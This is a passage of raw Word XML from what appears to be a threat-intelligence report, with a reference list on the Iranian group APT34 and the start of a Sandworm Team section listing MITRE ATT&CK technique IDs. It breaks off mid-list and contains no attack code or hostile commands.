            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="792FE34F" w14:textId="77777777" w:rsidR="00817791" w:rsidRPr="00F808AD" w:rsidRDefault="00817791" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D303374" w14:textId="77777777" w:rsidR="00817791" w:rsidRPr="00F808AD" w:rsidRDefault="00817791" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D32B663" w14:textId="77777777" w:rsidR="00817791" w:rsidRPr="00F808AD" w:rsidRDefault="00817791" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D8BFE96" w14:textId="77777777" w:rsidR="00817791" w:rsidRPr="00F808AD" w:rsidRDefault="00817791" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="126"/>
    </w:tbl>
    <w:p w14:paraId="4B837258" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="0077286F" w:rsidRDefault="00063FEC" w:rsidP="00063FEC"/>
    <w:p w14:paraId="0CC68A37" w14:textId="4D05C3AC" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="00063FEC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId160" w:history="1">
        <w:r w:rsidR="006379F7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Hard Pass: Declining APT34’s Invite to Join Their Professional Network | Mandiant</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006379F7" w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[201</w:t>
      </w:r>
      <w:r w:rsidR="006379F7">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262C765A" w14:textId="251C500B" w:rsidR="006379F7" w:rsidRDefault="006379F7" w:rsidP="00063FEC">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId161" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Iran Linked APT Using LinkedIn to Spread Malware - Binary </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Defense</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2019]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A376F2B" w14:textId="335AB497" w:rsidR="00EE4EF7" w:rsidRDefault="00EE4EF7" w:rsidP="00063FEC">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId162" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>What we can learn from APT34 using a fake University of Cambridge LinkedIn profile (cygenta.co.uk)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E85796">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E85796">
        <w:t>( google</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E85796">
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="00E85796" w:rsidRPr="00E85796">
        <w:t>ERFT-Details.xls</w:t>
      </w:r>
      <w:r w:rsidR="00E85796">
        <w:t>”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CEE597" w14:textId="43C5A863" w:rsidR="00A81708" w:rsidRDefault="00A81708" w:rsidP="00063FEC">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId163" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>TONEDEAF (Malware Family) (fraunhofer.de)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2021]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D9BA2B" w14:textId="3470EC94" w:rsidR="00752716" w:rsidRDefault="00752716" w:rsidP="00063FEC">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId164" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit | Mandiant</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2017]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B30C866" w14:textId="7C08BEC9" w:rsidR="00176F35" w:rsidRDefault="00176F35" w:rsidP="00063FEC">
      <w:r>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:hyperlink r:id="rId165" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Iranian Campaign Tailored to US Companies Uses Updated Toolset - </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Intezer</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2020]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768C0D77" w14:textId="461FC594" w:rsidR="00DC3BB8" w:rsidRDefault="00DC3BB8" w:rsidP="00063FEC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:hyperlink r:id="rId166" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>OilRig</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>, COBALT GYPSY, IRN2, APT34, Helix Kitten, Group G0049 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185820E3" w14:textId="55430003" w:rsidR="00891095" w:rsidRPr="00040E58" w:rsidRDefault="00891095" w:rsidP="00040E58">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F9391B" w14:textId="40F287C1" w:rsidR="0086655E" w:rsidRDefault="0086655E" w:rsidP="0086655E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_Toc110935540"/>
      <w:bookmarkStart w:id="128" w:name="_Toc153480899"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sandworm Team</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w14:paraId="73148267" w14:textId="77777777" w:rsidR="00706361" w:rsidRPr="005B4630" w:rsidRDefault="00706361" w:rsidP="00706361">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="_Toc153480900"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w14:paraId="52F7D625"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 xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0034 - Sandworm Team is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF3C9C"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The Group ATT&amp;CK attribution is Russia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7724E71D"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The Group TCERT attribution is RU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC33773"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance ['T1589.002', 'T1589.003', 'T1598.003', 'T1592.002', 'T1593', 'T1591.002', 'T1595.002', 'T1594', 'T1590.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2533109E"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T1589.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Gather Victim Identity Information&gt;:Email Addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33114F12"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T1589.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Gather Victim Identity Information&gt;:Employee Names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A133EEE"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T1598.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing for Information&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F61FEB0"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T1592.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Gather Victim Host Information&gt;:Software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7471B1"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1593 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Search Open Websites/Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373A5F47"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T1591.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Gather Victim Org Information&gt;:Business Relationships</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556607AD"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T1595.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Active Scanning&gt;:Vulnerability Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46414C5E"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1594 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Search Victim-Owned Websites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521B87CA"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T1590.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Gather Victim Network Information&gt;:Domain Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053541D4"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development ['T1584.005', 'T1588.006', 'T1588.002', 'T1583.004', 'T1583.001', 'T1585.002', 'T1585.001', 'T1587.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672B15A4"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T1584.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Compromise Infrastructure&gt;:Botnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEA142F"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T1588.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obtain Capabilities&gt;:Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01154697"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T1588.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obtain Capabilities&gt;:Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2841B78B"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T1583.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Acquire Infrastructure&gt;:Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2B1B2C"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T1583.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Acquire Infrastructure&gt;:Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBE5DDC"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T1585.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Establish Accounts&gt;:Email Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E238E52"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T1585.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Establish Accounts&gt;:Social Media Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4517D1FB"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T1587.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Develop Capabilities&gt;:Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDF5D21"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1078.002', 'T1566.002', 'T1199', 'T1195.002', 'T1133', 'T1078', 'T1566.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0497C0"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T1078.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Domain Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743E75A4"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T1566.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B340D11"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1199 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Trusted Relationship</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E5FBA6"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T1195.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Supply Chain Compromise&gt;:Compromise Software Supply Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF3EB2B"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1133 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> External Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B919E9F"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7F16F9"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736B2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00736B2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736B2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736B2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A126CD"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1059.003', 'T1047', 'T1059.001', 'T1204.001', 'T1059.005', 'T1204.002', 'T1203']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5A3FDE"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T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605106BB"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1047 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows Management Instrumentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7C2108"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T1059.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780BF55D"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T1204.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD0D93B"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T1059.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502AB4BA"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736B2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00736B2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11642CFF"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r w:rsidRPr="00736B2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00736B2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1203 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00736B2D">
